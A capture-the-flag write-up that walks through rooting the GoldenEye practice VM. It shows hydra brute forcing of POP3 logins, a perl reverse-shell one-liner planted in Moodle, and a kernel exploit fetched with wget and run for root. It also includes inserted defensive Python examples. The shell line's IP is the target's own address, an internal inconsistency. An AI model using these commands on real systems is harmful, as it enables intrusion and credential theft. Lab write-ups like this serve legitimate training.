Golden Eye

What up party people!

Let's get right to it, this is the GoldenEye CTF challenge by creosote, struggled through by yours truly. I actually really enjoyed this CTF; I learnt about POP3 CLI commands and Moodle exploitation techniques, as well as basic Linux privilege escalation. Read on to see how!

Starting with a netdiscover command to find the target's IP, I then ran this nmap scan to enumerate the open ports and their services.

nmap -A -sT -sV -p-65535 -oN goldeneye.txt 192.168.128.15

Alright, hopefully we've found some good stuff.

PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/unknown
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
55007/tcp open unknown
Running: Linux 3.X|4.X

Let's go to that address and see what's running on the web server…

Some sort of login page…

After browsing through the page source I found a couple of useful things in a file called “terminal.js”: two usernames and a potential password. Score.

//
//Boris, make sure you update your default password. 
//My sources say MI6 maybe planning to infiltrate. 
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes
//

So the usernames Natalya and Boris, and what looks like an encoded password.

I did some research and discovered the characters were HTML-encoded ASCII characters, so after finding a converter online I got the password:

InvincibleHack3r
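For anyone who would rather not trust a random converter site with a password, here is an added example (my own code, not from the CTF or its author) that decodes HTML numeric character references and, going a step further than the single comment above, scans a whole JavaScript file for runs of them. The sample below is a reconstruction of the terminal.js comment, since the exact encoded text is not reproduced on this page; it encodes "InvincibleHack3r" with decimal references for the first ten characters and hex references for the rest so both forms get exercised. The lesson for the defender side is the same either way: encoding is not encryption, and anything shipped to the browser is readable.

```python
import html
import re

# Constructed sample in the style of the terminal.js comment described above.
# Not the page's real file: the password is re-encoded here for the example.
JS_SAMPLE = """\
//
//Boris, make sure you update your default password.
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#x48;&#x61;&#x63;&#x6b;&#x33;&#x72;
//
"""

# One numeric character reference: &#NNN; (decimal) or &#xHH; (hex).
_NCR = re.compile(r"&#([xX][0-9a-fA-F]+|[0-9]+);")
# A run of four or more consecutive references, which is what an encoded
# secret looks like inside otherwise plain text.
_NCR_RUN = re.compile(r"(?:&#(?:[xX][0-9a-fA-F]+|[0-9]+);){4,}")


def decode_numeric_entities(text: str) -> str:
    """Replace numeric character references with the characters they name."""
    def repl(m):
        body = m.group(1)
        code = int(body[1:], 16) if body[0] in "xX" else int(body, 10)
        if code > 0x10FFFF:
            return m.group(0)  # not a valid code point; leave the raw text alone
        return chr(code)
    return _NCR.sub(repl, text)


def decode_with_stdlib(text: str) -> str:
    """Same job using the standard library, for cross-checking."""
    return html.unescape(text)


def find_encoded_strings(source: str):
    """Return (line_number, decoded) for every run of numeric references in source.
    Handy when reviewing client-side files for secrets hidden by encoding alone."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for run in _NCR_RUN.finditer(line):
            hits.append((lineno, decode_numeric_entities(run.group(0))))
    return hits


if __name__ == "__main__":
    for lineno, decoded in find_encoded_strings(JS_SAMPLE):
        print(f"line {lineno}: {decoded}")
```

Run it as-is and it reports the decoded string on line 5 of the sample; point find_encoded_strings at any downloaded .js file to get the same report for real content.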

Ballin’, let's try those two usernames with that password back over at /sev-home/.

Success!

Let's check out ports 55006 and 55007 for the POP3 server.

Boom, found the POP3 server on port 55007.

telnet 192.168.128.15 55007
Trying 192.168.128.15...
Connected to 192.168.128.15.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System

First attempts to log in with the password InvincibleHack3r for each user were unsuccessful. Admin is requesting that Boris update his default password, so maybe we can brute force the POP3 server… let's hit it with hydra and see if we can't bust in. First I made a txt file called goldusers.txt with the usernames in it, then pointed hydra at it:

hydra -L goldusers.txt -P /usr/share/wordlists/fasttrack.txt pop3://192.168.128.15:55007

Success!

[55007][pop3] host: 192.168.128.15 login: boris password: secret1!
[55007][pop3] host: 192.168.128.15 login: natalya password: bird
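From the other side of the wire, a hydra run like this is a burst of failed POP3 logins from one source in a couple of minutes, followed by a success. As an added example (my own code, not part of the original post or of Dovecot), here is the detection logic I'd run over the mail server's auth log: it keeps a sliding window of failures per remote IP, raises a "burst" alert the first time a source crosses the threshold, and raises a second, more urgent alert if that same source later logs in successfully. The log lines are constructed for this example; their shape is modelled on Dovecot's pop3-login messages but that is an assumption, so adjust the regex to whatever your server actually writes. The year is assumed too, since syslog timestamps don't carry one.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed log sample. The line shape is modelled on Dovecot's pop3-login
# messages (syslog timestamp, "auth failed", user=<...>, rip=<remote IP>), but
# these lines were written for this example and not captured from any server.
LOG_SAMPLE = """\
Nov 23 21:55:04 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.128.10, lip=192.168.128.15
Nov 23 21:55:05 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<natalya>, method=PLAIN, rip=192.168.128.10, lip=192.168.128.15
Nov 23 21:55:06 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.128.10, lip=192.168.128.15
Nov 23 21:55:08 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<natalya>, method=PLAIN, rip=192.168.128.10, lip=192.168.128.15
Nov 23 21:55:09 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.128.10, lip=192.168.128.15
Nov 23 21:55:11 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<natalya>, method=PLAIN, rip=192.168.128.10, lip=192.168.128.15
Nov 23 21:55:30 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.128.20, lip=192.168.128.15
Nov 23 21:57:20 ubuntu dovecot: pop3-login: Login: user=<boris>, method=PLAIN, rip=192.168.128.10, lip=192.168.128.15
"""

_LINE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ dovecot: pop3-login: "
    r"(?P<event>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>"
    r".*?\brip=(?P<rip>[^,\s]+)"
)

# Syslog timestamps carry no year; one is assumed here so time deltas can be
# computed (a log spanning New Year would need real handling).
LOG_YEAR = 2018


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%b %d %H:%M:%S").replace(year=LOG_YEAR)


def detect_bruteforce(log_text: str, threshold: int = 5, window_s: int = 60):
    """Walk the log once and return alerts as tuples:
    ("burst", rip, failures_in_window, ts) the first time a source IP reaches
    `threshold` failed logins within `window_s` seconds, and
    ("success-after-burst", rip, user, ts) when that source later logs in."""
    recent = defaultdict(deque)   # rip -> timestamps of failures still in the window
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        ts, rip = parse_ts(m["ts"]), m["rip"]
        if m["event"] == "Login":
            if rip in flagged:
                alerts.append(("success-after-burst", rip, m["user"], m["ts"]))
            continue
        window = recent[rip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_s:
            window.popleft()
        if len(window) >= threshold and rip not in flagged:
            flagged.add(rip)
            alerts.append(("burst", rip, len(window), m["ts"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(LOG_SAMPLE):
        print(alert)
```

On the sample this flags 192.168.128.10 after its fifth failure at 21:55:09 and again when boris logs in from it at 21:57:20, while the single failure from 192.168.128.20 stays quiet. The "success-after-burst" alert is the one worth paging on: a burst alone may be a mistyped password, a burst followed by a login is a guessed one.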

Once I had logged into both accounts (after learning how to read mail on a POP3 server from the helpful site sunnyoasis) and read the emails, I discovered another set of user credentials. Awesome.

username: xenia
password: RCP90rulez!

It also told user natalya to map severnaya-station.com to the server IP in /etc/hosts. After finding that file and adding the entry I was able to navigate to the internal domain severnaya-station.com/gnocertdir.

127.0.0.1 localhost
127.0.1.1 kali
192.168.128.15 severnaya-station.com

Hey, look at that, got myself a Moodle login screen, and hopefully some creds to open it.

I noticed the user had a message telling her to contact him through email, so I ran Doak's name through a hydra brute force and found his login information. Excellent.

 

root@kali:~# hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.128.15:55007
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 21:55:03
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.128.15:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.128.15 login: doak password: goat
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 21:57:33

 

root@kali:~# telnet 192.168.128.15 55007
Trying 192.168.128.15...
Connected to 192.168.128.15.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!
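The telnet session above is the whole POP3 protocol in miniature: USER and PASS in the AUTHORIZATION state, then LIST and RETR in the TRANSACTION state, with multi-line replies terminated by a lone dot. To make that concrete, here is an added example (my own code, not the post's and not Dovecot's) of a minimal POP3 server state machine plus a scripted client that prints the exchange from both sides. The mailbox, the user "alice" and her password are constructed for the example. Two details worth noticing: USER always answers +OK so that step alone doesn't confirm account names, and every credential travels in cleartext, which is exactly why the nmap scan showed Dovecot also listening with TLS on 55006.

```python
# Constructed mailbox for the example: user -> (password, list of messages).
MAILBOXES = {
    "alice": ("example-password", [
        "From: alice@example.test\r\nSubject: hello\r\n\r\nline one\r\n.leading dot line\r\n",
    ]),
}


class Pop3Session:
    """Server side of one POP3 connection: AUTHORIZATION, then TRANSACTION (RFC 1939)."""

    def __init__(self, mailboxes):
        self.mailboxes = mailboxes
        self.state = "AUTHORIZATION"
        self.pending_user = None
        self.messages = []
        self.failed_logins = 0

    def greeting(self):
        return "+OK POP3 server ready"

    def handle(self, line):
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb == "QUIT":
            self.state = "UPDATE"
            return "+OK Bye"
        if self.state == "AUTHORIZATION":
            return self._authorization(verb, arg)
        if self.state == "TRANSACTION":
            return self._transaction(verb, arg)
        return "-ERR Connection closed"

    def _authorization(self, verb, arg):
        if verb == "USER":
            self.pending_user = arg
            # +OK whether or not the account exists: USER alone reveals nothing.
            return "+OK"
        if verb == "PASS":
            entry = self.mailboxes.get(self.pending_user)
            self.pending_user = None
            if entry is None or entry[0] != arg:
                self.failed_logins += 1
                return "-ERR [AUTH] Authentication failed."
            self.messages = list(entry[1])
            self.state = "TRANSACTION"
            return "+OK Logged in."
        return "-ERR Not logged in"

    def _transaction(self, verb, arg):
        if verb == "STAT":
            return f"+OK {len(self.messages)} {sum(len(m) for m in self.messages)}"
        if verb == "LIST":
            lines = [f"+OK {len(self.messages)} messages:"]
            lines += [f"{i} {len(m)}" for i, m in enumerate(self.messages, start=1)]
            return "\r\n".join(lines + ["."])
        if verb == "RETR":
            if not arg.isdigit() or not 1 <= int(arg) <= len(self.messages):
                return "-ERR No such message"
            body = self.messages[int(arg) - 1]
            # Byte-stuff lines that start with "." so the client cannot mistake
            # them for the terminating line; the size reported is the raw size.
            stuffed = [("." + l) if l.startswith(".") else l
                       for l in body.rstrip("\r\n").split("\r\n")]
            return "\r\n".join([f"+OK {len(body)} octets"] + stuffed + ["."])
        return "-ERR Unknown command"


def run_script(session, commands):
    """Drive a session with client lines; return the transcript as
    ("S", text) / ("C", text) pairs, the way a telnet session shows it."""
    transcript = [("S", session.greeting())]
    for cmd in commands:
        transcript.append(("C", cmd))
        transcript.append(("S", session.handle(cmd)))
    return transcript


if __name__ == "__main__":
    script = ["USER alice", "PASS wrong", "USER alice", "PASS example-password",
              "LIST", "RETR 1", "RETR 2", "QUIT"]
    for side, text in run_script(Pop3Session(MAILBOXES), script):
        for line in text.split("\r\n"):
            print(f"{side}: {line}")
```

Running it prints the same shape of dialogue as the telnet session above, including a failed PASS, the LIST summary and a RETR whose dot-leading line comes back doubled; a real client strips that extra dot again before showing the message.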

Excellenter, found another set of creds I can try.

After browsing through Dr_Doak's Moodle account I found a secret.txt file with this very helpful link in it…

007,

I was able to capture this apps adm1n cr3ds through clear txt.

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

I navigated to that URL and found an image; I'll download this and check it out.

I was taught that a quick way to check an image for hidden data is to run the strings command, so after checking for strings of at least 10 characters I found what looks like a piece of encoded information…

root@kali:~# strings -10 Downloads/for-007.jpg 
eFdpbnRlcjE5OTV4IQ==
""""""""""
! !!! !!!!!!!!"""""""""""""""
{k{]=QEiBA

I looked up how to decode base64 strings on the command line and found this helpful command, which looks like it decoded the password…

root@kali:~# echo eFdpbnRlcjE5OTV4IQ== | base64 --decode
xWinter1995x!
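The two steps above (strings, then eyeball the output for something base64-shaped, then decode) are exactly what I'd automate when triaging a suspicious image. Here is an added example (my own code, not the post's) that reimplements the strings -10 pass in Python and pairs each printable run with its plaintext if it is well-formed base64 that decodes to printable ASCII; the length-multiple-of-4 and printability checks are what keep ordinary words that happen to use the base64 alphabet from showing up as false positives. The "file" it scans is constructed for the example: a JPEG-like header, a COM (comment) segment carrying the base64 string from above, and some binary noise with printable runs in it, standing in for the real for-007.jpg which is not reproduced here.

```python
import base64
import binascii
import re

# Constructed sample "file": a JPEG-like start-of-image and APP0 header, then a
# COM segment (0xFFFE, 2-byte length) carrying a base64 string, then binary
# noise that happens to contain printable runs, as the strings output above did.
# Not the page's for-007.jpg, only a stand-in shaped like it.
SAMPLE_FILE = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    b"\xff\xfe\x00\x16eFdpbnRlcjE5OTV4IQ==\x00"
    b"\x10\x1a\xf3" + b'"' * 10 + b"\x01\x02" + b'! !!! !!!!!!!!"""""' + b"\xff\xd9"
)

# Same idea as `strings -N`: runs of printable ASCII bytes.
_PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]+")
_B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def extract_strings(data: bytes, min_len: int = 10):
    """Return the printable-ASCII runs of at least min_len bytes, in file order."""
    return [m.group(0) for m in _PRINTABLE_RUN.finditer(data) if len(m.group(0)) >= min_len]


def try_base64(candidate: str):
    """Decode `candidate` if it is well-formed base64 whose plaintext is printable
    ASCII; otherwise return None. Ordinary words that merely use the base64
    alphabet fail either the length rule or the printability rule."""
    if len(candidate) % 4 or not _B64_SHAPE.match(candidate):
        return None
    try:
        raw = base64.b64decode(candidate, validate=True)
    except binascii.Error:
        return None
    if not raw or any(b < 0x20 or b > 0x7E for b in raw):
        return None
    return raw.decode("ascii")


def find_base64_strings(data: bytes, min_len: int = 10):
    """Pair every strings hit that decodes cleanly with its plaintext."""
    hits = []
    for run in extract_strings(data, min_len):
        text = run.decode("ascii")
        decoded = try_base64(text)
        if decoded is not None:
            hits.append((text, decoded))
    return hits


if __name__ == "__main__":
    for run in extract_strings(SAMPLE_FILE):
        print("string:", run)
    for encoded, decoded in find_base64_strings(SAMPLE_FILE):
        print(f"{encoded}  ->  {decoded}")
```

On a real file, swap SAMPLE_FILE for open(path, "rb").read(). Anything that survives both filters deserves a look, but remember the converse too: a clean report here says nothing about data hidden in the pixel values themselves, which is a job for proper steganalysis rather than strings.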

Excellent, so I have what looks like the password for the adm1n creds, thanks Dr_Doak. In the s3cret.txt file he mentioned he had captured the adm1n creds, so let's try adm1n with this password. No luck. Let's try just normal admin… giddy up.

Let's poke around and see what we can find. Let's check if msfconsole has a Moodle command injection exploit and make things easy for ourselves. Success!

msf > search moodle

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/http/moodle_cmd_exec 2013-10-30 good Moodle Remote Command Execution


msf > use exploit/multi/http/moodle_cmd_exec 
msf exploit(multi/http/moodle_cmd_exec) >

OK, so after putting in the credentials it runs the exploit but doesn't give an easy shell (the module reports that the login failed), bummer. Let's go deeper and see.

msf exploit(multi/http/moodle_cmd_exec) > exploit

[*] Started reverse TCP double handler on 192.168.128.10:4444 
[*] Authenticating as user: admin
[-] Exploit aborted due to failure: no-access: Login failed
[*] Exploit completed, but no session was created.

The System paths area of the Server tab in the Site administration section looks like it will let us execute commands. After looking up the path to aspell, I think I can replace the existing value with my own one-line perl reverse shell from my favorite cheat sheet for shells here (shout out to pentest monkey) and have it run.

The full code is:

perl -e 'use Socket;$i="192.168.128.15";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

When I was reading up it mentioned the TinyMCE HTML editor needing to be set to PSpellShell, so let's also make sure that's set.

Finally, let's make sure we have a listener set up to catch the shell.

root@kali:~# nc -nlvp 1234
listening on [any] 1234 ...

OK, so I'm going to make a post and hopefully when I spell check it I get a shell.

Got it!

root@kali:~# nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.128.10] from (UNKNOWN) [192.168.128.15] 40648
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Let's find out what type of Linux we're running here. After brief reconnaissance we can see it's Ubuntu on kernel 3.13.0-32.

$ uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

After searching for some vulnerabilities online I came across exploit 37292, so let's download that and transfer it to our target with Python's SimpleHTTPServer.

root@kali:~# python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.128.15 - - [28/Nov/2018 08:57:25] "GET /37292.c HTTP/1.1" 200 -
$ cd /var/tmp 
$ wget http://192.168.128.10:8000/37292.c
--2018-11-28 05:57:16-- http://192.168.128.10:8000/37292.c
Connecting to 192.168.128.10:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: '37292.c'
0K .... 100% 5.12M=0.001s

2018-11-28 05:57:16 (5.12 MB/s) - '37292.c' saved [5119/5119]

Opening the exploit in gedit shows it uses gcc to compile; however, gcc isn't available on the target, so I used cc, but sadly this also failed.

$ gcc 37292.c 
/bin/sh: 11: gcc: not found
$ cc 37292.c -o pwn
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)

37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);

37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);

37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);

5 warnings generated.

Looks like the code itself is still referencing gcc, so I'll change that and try again. I renamed the exploit expl.c.

$ cc expl.c -o ownage
$ ./ownage
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# whoami
root

After navigating to the /root directory and listing all files, hidden ones included, I found another flag.

# cd /root
# ls -lah
total 44K
drwx------ 3 root root 4.0K Apr 29 2018 .
drwxr-xr-x 22 root root 4.0K Apr 24 2018 ..
-rw-r--r-- 1 root root 19 May 3 2018 .bash_history
-rw-r--r-- 1 root root 3.1K Feb 19 2014 .bashrc
drwx------ 2 root root 4.0K Apr 28 2018 .cache
-rw------- 1 root root 144 Apr 29 2018 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1.0K Apr 23 2018 .rnd
-rw------- 1 root root 8.2K Apr 29 2018 .viminfo

# cat .flag.txt
Alec told me to place the codes here:

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

Let's go there and see what the fuss is about.

Excellent! Another job well done.